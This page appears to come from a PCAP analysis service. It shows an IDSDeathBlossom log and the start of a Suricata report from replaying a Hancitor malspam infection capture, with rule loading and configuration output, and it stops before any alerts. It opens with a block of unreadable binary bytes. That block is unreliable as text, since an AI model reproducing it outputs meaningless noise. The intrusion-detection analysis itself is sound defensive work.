	fPÀP¦‹®–0ª–ñ¨d¡©Û׬FqE5àRQ;B‚ˆRÕýÄO´øýŒ¡#
}xz¢Vk‰Ç¬ÌOHkÇD«!
)X2êTjs6¿ [Ý_˜mË|Î¯T«­
ØÝl ¤ôÇ’k$¨Cµ‚2ƒÜý¡€ÎdBü®Ó±©äMù-70þý—!ªVÒóI5‹do ©”—Øþ%¡·žD˜¸ÇcC¬÷i€¨4ë8Éú_lòGN”{øÆ
€¬]Õ¯U+ÖP!¯É„ÿSÛQ‡l°þ¿æ–ágaQiFì0„¥DBCuĀ'Æ«ÃD¦oÂTùû®½P¨Í< ðíýݱÝ@Bz‚šEéֆƒ»BsP¨
P¯™‘[:exF4ˆëÂT¯P1P¨ÆdÏÛø‰Æ Ÿӟ—Ä€+ÓDªû4‚

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1185 bytes) - download
1
2
3
4
5
6
7
8
2019-01-28 12:18:59,573 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-28 12:19:00,301 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-28 12:19:00,301 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-28 12:19:00,301 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-28 12:19:00,301 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-28 12:19:00,302 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dab56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
2019-01-28 12:19:23,263 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-28 12:19:23,264 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.7018799782


suricata-report-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (17838 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dab56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
elapsedtime:22.959764
stderr:
stdout:
28/1/2019 -- 12:19:00 - <Info> - Configuration node 'rule-files' redefined.
28/1/2019 -- 12:19:00 - <Notice> - This is Suricata version 4.0.0 RELEASE
28/1/2019 -- 12:19:00 - <Info> - CPUs/cores online: 1
28/1/2019 -- 12:19:00 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32143 and 'request-body-inspect-window' set to 16915 after randomization.
28/1/2019 -- 12:19:00 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33477 and 'response-body-inspect-window' set to 17003 after randomization.
28/1/2019 -- 12:19:00 - <Config> - DNS request flood protection level: 500
28/1/2019 -- 12:19:00 - <Config> - DNS per flow memcap (state-memcap): 524288
28/1/2019 -- 12:19:00 - <Config> - DNS global memcap: 16777216
28/1/2019 -- 12:19:00 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
28/1/2019 -- 12:19:00 - <Config> - preallocated 1000 hosts of size 136
28/1/2019 -- 12:19:00 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
28/1/2019 -- 12:19:00 - <Config> - using magic-file /usr/share/file/magic
28/1/2019 -- 12:19:00 - <Config> - Core dump size is unlimited.
28/1/2019 -- 12:19:00 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
28/1/2019 -- 12:19:00 - <Config> - preallocated 1000 defrag trackers of size 168
28/1/2019 -- 12:19:00 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
28/1/2019 -- 12:19:00 - <Config> - stream "prealloc-sessions": 2048 (per thread)
28/1/2019 -- 12:19:00 - <Config> - stream "memcap": 33554432
28/1/2019 -- 12:19:00 - <Config> - stream "midstream" session pickups: disabled
28/1/2019 -- 12:19:00 - <Config> - stream "async-oneside": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "checksum-validation": disabled
28/1/2019 -- 12:19:00 - <Config> - stream."inline": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "bypass": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "max-synack-queued": 5
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "memcap": 134217728
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "depth": 0
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "toserver-chunk-size": 2471
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "toclient-chunk-size": 2600
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly.raw: enabled
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "segment-prealloc": 2048
28/1/2019 -- 12:19:00 - <Config> - Delayed detect disabled
28/1/2019 -- 12:19:00 - <Config> - pattern matchers: MPM: ac, SPM: bm
28/1/2019 -- 12:19:00 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
28/1/2019 -- 12:19:00 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
28/1/2019 -- 12:19:00 - <Config> - prefilter engines: MPM
28/1/2019 -- 12:19:00 - <Config> - IP reputation disabled
28/1/2019 -- 12:19:00 - <Perf> - Registered 148 keyword profiling counters.
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
28/1/2019 -- 12:19:05 - <Config> - No rules loaded from ET-icmp.rules.
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
28/1/2019 -- 12:19:13 - <Config> - No rules loaded from local.rules.
28/1/2019 -- 12:19:13 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
28/1/2019 -- 12:19:13 - <Info> - Threshold config parsed: 0 rule(s) found
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tcp-packet
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tcp-stream
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for udp-packet
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for other-ip
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_uri
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_request_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_client_body
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_response_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header_names
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header_names
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept_enc
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept_lang
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_referer
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_connection
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_len
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_len
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_type
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_type
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_start
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_start
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_method
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_cookie
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_cookie
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_uri
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_user_agent
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_host
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_host
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_stat_msg
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_stat_code
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dns_query
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_sni
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_issuer
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_subject
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_serial
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_software
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_software
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for file_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for file_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_request_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_response_line
28/1/2019 -- 12:19:13 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
28/1/2019 -- 12:19:13 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
28/1/2019 -- 12:19:14 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
28/1/2019 -- 12:19:14 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
28/1/2019 -- 12:19:14 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
28/1/2019 -- 12:19:14 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
28/1/2019 -- 12:19:14 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
28/1/2019 -- 12:19:14 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
28/1/2019 -- 12:19:18 - <Perf> - Unique rule groups: 104
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver TCP packet": 35
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient TCP packet": 17
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver TCP stream": 33
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient TCP stream": 19
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver UDP packet": 27
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient UDP packet": 17
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "other IP packet": 3
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_uri": 14
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_request_line": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_client_body": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_response_line": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_header": 10
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_header": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_header_names": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_accept": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_referer": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_content_len": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_content_type": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_content_type": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_protocol": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_start": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_method": 5
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_cookie": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_cookie": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_host": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver dns_query": 4
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver tls_sni": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver file_data": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient file_data": 7
28/1/2019 -- 12:19:20 - <Perf> - Registered 39590 rule profiling counters.
28/1/2019 -- 12:19:20 - <Info> - fast output device (regular) initialized: alert
28/1/2019 -- 12:19:20 - <Info> - eve-log output device (regular) initialized: eve.json
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'alert'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'http'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'dns'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'tls'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'files'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'ssh'
28/1/2019 -- 12:19:20 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
28/1/2019 -- 12:19:20 - <Info> - stats output device (regular) initialized: stats.log
28/1/2019 -- 12:19:20 - <Config> - AutoFP mode using "Hash" flow load balancer
28/1/2019 -- 12:19:20 - <Info> - reading pcap file /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap
28/1/2019 -- 12:19:

This file has been truncated. Go here to download in full.